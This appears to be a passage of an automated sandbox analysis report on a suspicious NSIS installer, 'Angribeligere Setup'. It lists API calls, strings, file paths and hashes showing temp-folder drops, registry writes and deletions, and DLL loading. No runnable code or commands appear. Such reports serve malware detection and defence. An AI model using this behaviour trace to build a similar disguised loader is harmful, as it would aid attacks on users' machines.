                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDA
                                        • EnableWindow.USER32(?,?), ref: 00403DF5
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
                                        • EnableMenuItem.USER32(00000000), ref: 00403E12
                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2A
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
                                        • lstrlenA.KERNEL32(Angribeligere Setup: Installing,?,Angribeligere Setup: Installing,00422F00), ref: 00403E66
                                        • SetWindowTextA.USER32(?,Angribeligere Setup: Installing), ref: 00403E75
                                        • ShowWindow.USER32(?,0000000A), ref: 00403FA9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID: Angribeligere Setup: Installing
                                        • API String ID: 3282139019-2219571644
                                        • Opcode ID: ee793e9f516e2da13c3aa51fc91f44a41e00c2883a64dc2cf2643230f3a9d64a
                                        • Instruction ID: 1f8690e76de68066656ca8d54ad2d010e53819933bf2384d883f7e4ba9537b83
                                        • Opcode Fuzzy Hash: ee793e9f516e2da13c3aa51fc91f44a41e00c2883a64dc2cf2643230f3a9d64a
                                        • Instruction Fuzzy Hash: 17C1C071A04205BBDB21AF21ED48D2B7EBCFB44706F40443EF601B11E1C7799942AB6E

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                          • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                          • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                        • lstrcatA.KERNEL32(1033,Angribeligere Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Angribeligere Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77463410,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",00000000), ref: 00403802
                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun,1033,Angribeligere Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Angribeligere Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403895
                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun), ref: 004038DE
                                          • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                                        • RegisterClassA.USER32(00422EA0), ref: 0040391B
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403933
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
                                        • ShowWindow.USER32(00000005,00000000), ref: 0040399E
                                        • LoadLibraryA.KERNELBASE(RichEd20), ref: 004039AF
                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
                                        • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
                                        • RegisterClassA.USER32(00422EA0), ref: 004039E0
                                        • DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$.DEFAULT\Control Panel\International$.exe$1033$Angribeligere Setup: Installing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 914957316-2782496506
                                        • Opcode ID: d69af52eae453a52e03acfe7140820e929eba722ac2574cb4842baacd9f3a248
                                        • Instruction ID: 361ceaa5e45529a70bb989737ed67fdedcb7c759bf8cf29c3cde223c60b7be46
                                        • Opcode Fuzzy Hash: d69af52eae453a52e03acfe7140820e929eba722ac2574cb4842baacd9f3a248
                                        • Instruction Fuzzy Hash: E661E6B16442007EE720AF659D45F273E6CEB8475AF40407FF941B22E2D67C9D02DA6E

                                        Control-flow Graph

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402C8D
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fJuwM4Bwi7.exe,00000400), ref: 00402CA9
                                          • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 004059CB
                                          • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fJuwM4Bwi7.exe,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 00402CF2
                                        • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39
                                        Strings
                                        • "C:\Users\user\Desktop\fJuwM4Bwi7.exe", xrefs: 00402C79
                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                        • Null, xrefs: 00402D72
                                        • soft, xrefs: 00402D69
                                        • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                        • Inst, xrefs: 00402D60
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                        • C:\Users\user\Desktop\fJuwM4Bwi7.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                        • Error launching installer, xrefs: 00402CC9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fJuwM4Bwi7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-528179520
                                        • Opcode ID: 91e4b9dee6fe50fd73dc962a53e9cdaf65c065133738040780962d54176249d0
                                        • Instruction ID: 2a27acbe37a486d3f9fadad6f2898e15cdcbef103c1943e89973ac3215dbffb0
                                        • Opcode Fuzzy Hash: 91e4b9dee6fe50fd73dc962a53e9cdaf65c065133738040780962d54176249d0
                                        • Instruction Fuzzy Hash: BC61C671A40205ABDF20AF64DE89B9A76B4EF00315F20413BF904B72D1D7BC9E418BAD

                                        Control-flow Graph

                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies,00000000,00000000,00000031), ref: 0040177E
                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies,00000000,00000000,00000031), ref: 004017A8
                                          • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                          • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                          • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll), ref: 0040508D
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nszBD12.tmp$C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies$Call
                                        • API String ID: 1941528284-2973462801

                                        [Control-flow graph for the function at 40501f; nodes marked Executed / Not Executed]
                                        APIs
                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                        • lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll), ref: 0040508D
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll
                                        • API String ID: 2531174081-2590253870

                                        [Control-flow graph for the function at 40231c; nodes marked Executed / Not Executed]
                                        APIs
                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CloseCreateValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nszBD12.tmp
                                        • API String ID: 1356686001-1061038459

                                        [Control-flow graph for the function at 4015b3; nodes marked Executed / Not Executed]
                                        APIs
                                          • Part of subcall function 0040585F: CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040586D
                                          • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                                          • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies,00000000,00000000,000000F0), ref: 00401622
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies, xrefs: 00401617
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                        • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies
                                        • API String ID: 3751793516-1144022150

                                        [Control-flow graph for the function at 4059f6; nodes marked Executed / Not Executed]
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405A0A
                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-2569497942

                                        [Control-flow graph for the function at 402a3d; nodes marked Executed / Not Executed]
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                        • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0

                                        [Control-flow graph for the function at 100016bd; nodes marked Executed / Not Executed]
                                        APIs
                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                        • GlobalFree.KERNEL32(00000000), ref: 10001768
                                        • FreeLibrary.KERNEL32(?), ref: 100017DF
                                        • GlobalFree.KERNEL32(00000000), ref: 10001804
                                          • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                          • Part of subcall function 1000258D: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FF
                                          • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                        • String ID:
                                        • API String ID: 1791698881-3916222277

                                        [Control-flow graph for the function at 401bb8; nodes marked Executed / Not Executed]
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 0040304F
                                          • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                        • WriteFile.KERNELBASE(0040A8A0,0040FFD0,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                        • SetFilePointer.KERNELBASE(00005963,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$Pointer$CountTickWrite
                                        • String ID:
                                        • API String ID: 2146148272-0
                                        • Opcode ID: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                                        • Instruction ID: 01a25493adf58fb9a894681412e440a2e883d4234beea4965eba9eb13e735820
                                        • Opcode Fuzzy Hash: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                                        • Instruction Fuzzy Hash: CC414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389D52CB5E
                                        APIs
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                          • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                          • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll), ref: 0040508D
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: 8405f33e14f9c3f15d0e520106e072150188c144eaeb8d7ef96d34cccaac7bda
                                        • Instruction ID: 23a464ffe6ca8440643a385a127484fd4ee8ad6b227fb7efa4d26ad3fc5b3ac3
                                        • Opcode Fuzzy Hash: 8405f33e14f9c3f15d0e520106e072150188c144eaeb8d7ef96d34cccaac7bda
                                        • Instruction Fuzzy Hash: D7210872904211BACF107FA48E49A6E39B0AB44358F60823BF601B62D1D7BC4941AA6E
                                        APIs
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 00405FF9
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
